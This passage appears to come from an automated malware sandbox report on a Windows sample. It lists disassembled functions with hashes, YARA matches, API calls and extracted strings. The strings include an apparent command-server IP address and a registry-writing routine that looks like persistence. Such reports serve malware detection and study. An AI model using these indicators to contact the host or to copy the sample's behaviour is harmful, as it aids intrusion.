                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9d0267002f90c66333d7d1825960100aaeeb8f435373ac0cbd095dc85852dcee
                    • Instruction ID: b71f8c50ce0dd72571a0ca5e8b3d2aa1de8da5bf2e161ce718b9c77d89f93982
                    • Opcode Fuzzy Hash: 9d0267002f90c66333d7d1825960100aaeeb8f435373ac0cbd095dc85852dcee
                    • Instruction Fuzzy Hash: 215125F3E082205FE3146E6CDC8577ABBD8EB54710F1A453DEA88D7780E975980483C6
                    Function 0070230E Relevance: .2, Instructions: 161COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c7c83f90df1a05efb0d6b7abcee46baed5b29b77c8ae93b11639095b19dc477f
                    • Instruction ID: 66307d3d0f649762204a05ad1280219598c4186c2c3f8199dd6a88820f2843bb
                    • Opcode Fuzzy Hash: c7c83f90df1a05efb0d6b7abcee46baed5b29b77c8ae93b11639095b19dc477f
                    • Instruction Fuzzy Hash: DC5105B391C600DFD3056E28DC4953AF7E4EB54720F264E2DE9D683782D6399841AB83
                    Function 005624E1 Relevance: .2, Instructions: 159COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6b17eda27734f431733a89b0efedabcc721bf5373e751bd84014a0a1be3d6a66
                    • Instruction ID: 51e5d7bb09a33c559f4eda56f00f3e769762b2fba68a2913c8f31a6eac990a79
                    • Opcode Fuzzy Hash: 6b17eda27734f431733a89b0efedabcc721bf5373e751bd84014a0a1be3d6a66
                    • Instruction Fuzzy Hash: 4B415AF3A081005BE3005E2DDC4576BBBDAEFD4720F1B853DEAC4D7B44EA7999068296
                    Function 006C72A1 Relevance: .1, Instructions: 79COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 51a321f5081bcab23ddb1e56e6c7e940a84ca53432526b138f8c9bcd35899eee
                    • Instruction ID: b8ae7250014d7a60a09f4a4d8bbf48f59db212a0cf37f5946624da84e277c4d9
                    • Opcode Fuzzy Hash: 51a321f5081bcab23ddb1e56e6c7e940a84ca53432526b138f8c9bcd35899eee
                    • Instruction Fuzzy Hash: 46214FB250C308AFE716BE59DC857AAFBE5EF58310F05492DE7D483710E631A9108A97
                    Function 0040B6D0 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                    Function 0495B937 Relevance: .1, Instructions: 76COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: 31093a781ad63aed303cabcd308a4e0756b12fe3fa5f3aaf202d1ed763eb6600
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: D91127B720018247D655CA3ED4B42B6E79DEFC6329B3C477AD8858B77AD222B144D700
                    Function 00688132 Relevance: .1, Instructions: 66COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e30c0d5435bd2ebdc3ca0cbaf8467a403c747bbf48d72ae2cddbf857c5e0048
                    • Instruction ID: acc1b72413786fd9169f0ea31a990889d17b8f776d8ca64ff04e059f412f7394
                    • Opcode Fuzzy Hash: 1e30c0d5435bd2ebdc3ca0cbaf8467a403c747bbf48d72ae2cddbf857c5e0048
                    • Instruction Fuzzy Hash: 74114CB150D602DFE359BF29C89523AB7E6EB94310F628A2D92C6C7254EE304443DB96
                    Function 047A7D41 Relevance: .1, Instructions: 61COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: 08771eb7056d114c5da39982fe0a0733143f4f69ed40c61d8a9fd9b91280a921
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 8C1182723401009FD754DF65DC90FA673EAEBC9220B198156ED04CB315E675FC11C760
                    Function 04950D90 Relevance: .0, Instructions: 43COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: cacfbc0c46e98c86a351d82b4132ac5c712cceccaeed7baca1d735253631f30a
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: 3401A276A006049FDF21CF24C818BAA33E9EB86316F6544B5ED0A9B291E774B9458F90
                    Function 00409BDD Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                    • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                    • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                    Strings
                    • SleepConditionVariableCS, xrefs: 00409C11
                    • kernel32.dll, xrefs: 00409C00
                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                    • WakeAllConditionVariable, xrefs: 00409C1D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                    • API String ID: 2565136772-3242537097
                    • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                    • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                    • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                    • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                    Function 0041C3CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                    • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                    • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                    • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                    Function 0040BCFB Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                    • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                    • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                    • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 2751267872-393685449
                    • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                    • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                    • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                    • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                    Function 0495BF62 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • type_info::operator==.LIBVCRUNTIME ref: 0495C081
                    • ___TypeMatch.LIBVCRUNTIME ref: 0495C18F
                    • _UnwindNestedFrames.LIBCMT ref: 0495C2E1
                    • CallUnexpected.LIBVCRUNTIME ref: 0495C2FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 2751267872-393685449
                    • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                    • Instruction ID: 49a077c02193fad4963031e610288ab3dde81cabf894039e6f2048b220070edb
                    • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                    • Instruction Fuzzy Hash: 9DB11671800309AFDF29DFA4D8809AEBBB9BF44314F24456AEC156B221D771FA91CB91
                    Function 004058F0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122registrysleepCOMMON
                    Download Yara Rule
                    APIs
                    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                    • Sleep.KERNEL32(000003E8), ref: 00405AB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateOpenSleepValue
                    • String ID: 185.156.72.65$185.156.72.65$mixone
                    • API String ID: 4111408922-485810328
                    • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                    • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                    • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                    • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                    Function 04959E44 Relevance: 12.1, APIs: 8, Instructions: 51libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04959E22), ref: 04959E50
                    • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04959E22), ref: 04959E5B
                    • GetModuleHandleW.KERNEL32(0042000C,?,?,04959E22), ref: 04959E6C
                    • GetProcAddress.KERNEL32(00000000,00420028), ref: 04959E7E
                    • GetProcAddress.KERNEL32(00000000,00420044), ref: 04959E8C
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04959E22), ref: 04959EAF
                    • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04959ECB
                    • CloseHandle.KERNEL32(0042D060,?,?,04959E22), ref: 04959EDB
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                    • String ID:
                    • API String ID: 2565136772-0
                    • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                    • Instruction ID: f95af81ad5315ca355b259ccfb780d6e2e4be1318cf8d3b911b16a674888c97b
                    • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                    • Instruction Fuzzy Hash: C0015271F40711EBE7209BB4BC0DB9B3AECAB48705B604135BD05E2171DB78D80B8B68
                    Function 00413E0C Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                    • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                    • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                    • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                    Function 04964073 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                    • Instruction ID: 79f55e3a299b863bd512580f25b7e7a2d94f51e119f061a2853a0a3e81ce9c19
                    • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                    • Instruction Fuzzy Hash: BCB16B32A00365AFEB11CF98CC81FAE7BA9EF95314F154175E906AF281D274B901CBA5
                    Function 00401600 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162COMMON
                    Download Yara Rule
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                      • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                    • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                    • String ID: 185.156.72.65$string too long
                    • API String ID: 2123813255-2459586365
                    • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                    • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                    • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                    • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                    Function 0040B800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 0040B837
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                    • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                    • _ValidateLocalCookies.LIBCMT ref: 0040B948
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                    • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                    • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                    • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                    Function 00413379 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3664257935-537541572
                    • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                    • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                    • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                    • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                    Function 0040B9C4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                    • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                    • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                    • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                    • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                    Function 0495BC2B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,?,0495BC22,0495B1C6,0495A9D7), ref: 0495BC39
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0495BC47
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0495BC60
                    • SetLastError.KERNEL32(00000000,0495BC22,0495B1C6,0495A9D7), ref: 0495BCB2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                    • Instruction ID: fa83bc30c76dc1b346922600d2384d1d63f280bec9cd6f43eb71c9ca7c8fbf1c
                    • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                    • Instruction Fuzzy Hash: 1901B5322097119EB735ABBCFCC5A5B2A68EB4167C3704239ED24950F1EF5178055348
                    Function 04951867 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                    Download Yara Rule
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 0495186C
                      • Part of subcall function 04959AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04959AF5
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518A2
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518D9
                    • Concurrency::cancel_current_task.LIBCPMT ref: 049519EE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                    • String ID: 185.156.72.65
                    • API String ID: 2123813255-1765470537
                    • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                    • Instruction ID: a7ed5558de41f27cae143ab3c72e322dddedd3e6f85bbaf2a4dca6a38d894550
                    • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                    • Instruction Fuzzy Hash: 1941D7B1E00301EBE724DF64AC86B5AB6F8EF44214F300639ED5AD72A0E771B944C7A1
                    Function 004105C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,73BDA22C,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                    • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                    • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                    • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                    • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                    Function 00415050 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                    Download Yara Rule
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 004150D5
                    • __alloca_probe_16.LIBCMT ref: 0041519E
                    • __freea.LIBCMT ref: 00415205
                      • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                    • __freea.LIBCMT ref: 00415218
                    • __freea.LIBCMT ref: 00415225
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 1423051803-0
                    • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                    • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                    • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                    • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                    Function 04952CB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 04952D5F
